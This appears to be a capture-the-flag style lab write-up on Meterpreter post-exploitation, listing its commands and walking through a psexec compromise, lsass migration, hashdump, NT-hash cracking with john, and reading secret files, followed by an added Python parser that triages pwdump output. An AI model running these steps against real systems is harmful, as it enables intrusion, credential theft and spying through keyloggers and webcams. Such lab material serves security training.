Take a deep dive into Meterpreter, and see how in-memory payloads can be used for post-exploitation.
Core commands:

- `background`: Backgrounds the current session
- `exit`: Terminate the Meterpreter session
- `guid`: Get the session GUID (Globally Unique Identifier)
- `help`: Displays the help menu
- `info`: Displays information about a Post module
- `irb`: Opens an interactive Ruby shell on the current session
- `load`: Loads one or more Meterpreter extensions
- `migrate`: Allows you to migrate Meterpreter to another process
- `run`: Executes a Meterpreter script or Post module
- `sessions`: Quickly switch to another session
File system commands:

- `cd`: Will change directory
- `ls`: Will list files in the current directory (`dir` will also work)
- `pwd`: Prints the current working directory
- `edit`: Will allow you to edit a file
- `cat`: Will show the contents of a file to the screen
- `rm`: Will delete the specified file
- `search`: Will search for files
- `upload`: Will upload a file or directory
- `download`: Will download a file or directory
Networking commands:

- `arp`: Displays the host ARP (Address Resolution Protocol) cache
- `ifconfig`: Displays network interfaces available on the target system
- `netstat`: Displays the network connections
- `portfwd`: Forwards a local port to a remote service
- `route`: Allows you to view and modify the routing table
System commands:

- `clearev`: Clears the event logs
- `execute`: Executes a command
- `getpid`: Shows the current process identifier
- `getuid`: Shows the user that Meterpreter is running as
- `kill`: Terminates a process
- `pkill`: Terminates processes by name
- `ps`: Lists running processes
- `reboot`: Reboots the remote computer
- `shell`: Drops into a system command shell
- `shutdown`: Shuts down the remote computer
- `sysinfo`: Gets information about the remote system, such as OS
Other commands (these will be listed under different menu categories in the help menu):

- `idletime`: Returns the number of seconds the remote user has been idle
- `keyscan_dump`: Dumps the keystroke buffer
- `keyscan_start`: Starts capturing keystrokes
- `keyscan_stop`: Stops capturing keystrokes
- `screenshare`: Allows you to watch the remote user's desktop in real time
- `screenshot`: Grabs a screenshot of the interactive desktop
- `record_mic`: Records audio from the default microphone for X seconds
- `webcam_chat`: Starts a video chat
- `webcam_list`: Lists webcams
- `webcam_snap`: Takes a snapshot from the specified webcam
- `webcam_stream`: Plays a video stream from the specified webcam
- `getsystem`: Attempts to elevate your privilege to that of local system
- `hashdump`: Dumps the contents of the SAM database
| Title | IP Address |
|---|---|
| Win4Meterpreter | 1*.**.***.*** |
LHOST, using msfconsole:

```
db_nmap -A -vv -T4 -oN initial 1*.**.***.***
use exploit/windows/smb/psexec
hosts -R
set lhost 1*.*.**.**
set smbuser ballen
set smbpass Password1
run
```
RHOST, using meterpreter:

```
sysinfo
Computer : A***-T***
Domain : F****
background
```

LHOST, using msfconsole:

```
use post/windows/gather/enum_shares
set session 1
run
[*] Name: s********
sessions 1
```

RHOST, using meterpreter:

```
ps
756 632 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
migrate 756
hashdump
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:6*******************************:::
```

Copy the hash line, then:

```
background
```

LHOST, using msfconsole:

```
cat > hash
```

Paste the copied hash line into the file, then:

```
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
T******* (?)
sessions 1
```

RHOST, using meterpreter:

```
search -f secrets.txt
C:\P****** F**** (***)\W****** M********* P*******\secrets.txt (35 bytes)
cat "C:\P****** F**** (***)\W****** M********* P*******\secrets.txt"
My Twitter password is KDS********!
search -f realsecret.txt
C:\*******\*******\realsecret.txt (34 bytes)
cat "C:\*******\*******\realsecret.txt"
T** F**** i* t** f****** m** a****
```
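The `hashdump` line in the walkthrough is in pwdump format (`user:RID:LM_hash:NT_hash:::`). As an added example that is not part of the original write-up, the following Python script parses such output and reports what an auditor reviewing a dump wants to know: accounts with a blank password (NT hash of the empty string), accounts for which a real LM hash is still stored (LM storage not disabled), and the built-in Administrator RID. The sample dump is constructed for this example; its hashes are not the page's values.

```python
"""Parse Meterpreter hashdump output (pwdump format) and triage each entry."""
import re

# Well-known constants: the LM hash Windows stores when LM hashing is disabled
# (LM of the empty string) and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:RID:LM:NT:::  (LM and NT are 32 hex characters each)
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample dump (not from the page); one malformed line on purpose.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
svc_legacy:1201:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
this line is not a hash
"""


def parse_hashdump(text):
    """Return (entries, rejected): one dict per well-formed line, plus lines that did not parse."""
    entries, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            rejected.append(line)
            continue
        user, rid, lm, nt = m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()
        entries.append({
            "user": user, "rid": rid, "lm": lm, "nt": nt,
            "lm_stored": lm != EMPTY_LM,       # a real LM hash means the weak LM format is kept
            "blank_password": nt == EMPTY_NT,  # NT hash of "" => account has no password
            "builtin_admin": rid == 500,       # RID 500 is always the built-in Administrator
        })
    return entries, rejected


def triage(text):
    """Summarise the dump: counts plus the account names behind each finding."""
    entries, rejected = parse_hashdump(text)
    return {
        "accounts": len(entries),
        "rejected_lines": len(rejected),
        "blank_passwords": sorted(e["user"] for e in entries if e["blank_password"]),
        "lm_hashes_present": sorted(e["user"] for e in entries if e["lm_stored"]),
        "builtin_admin": [e["user"] for e in entries if e["builtin_admin"]],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HASHDUMP).items():
        print(f"{key}: {value}")
```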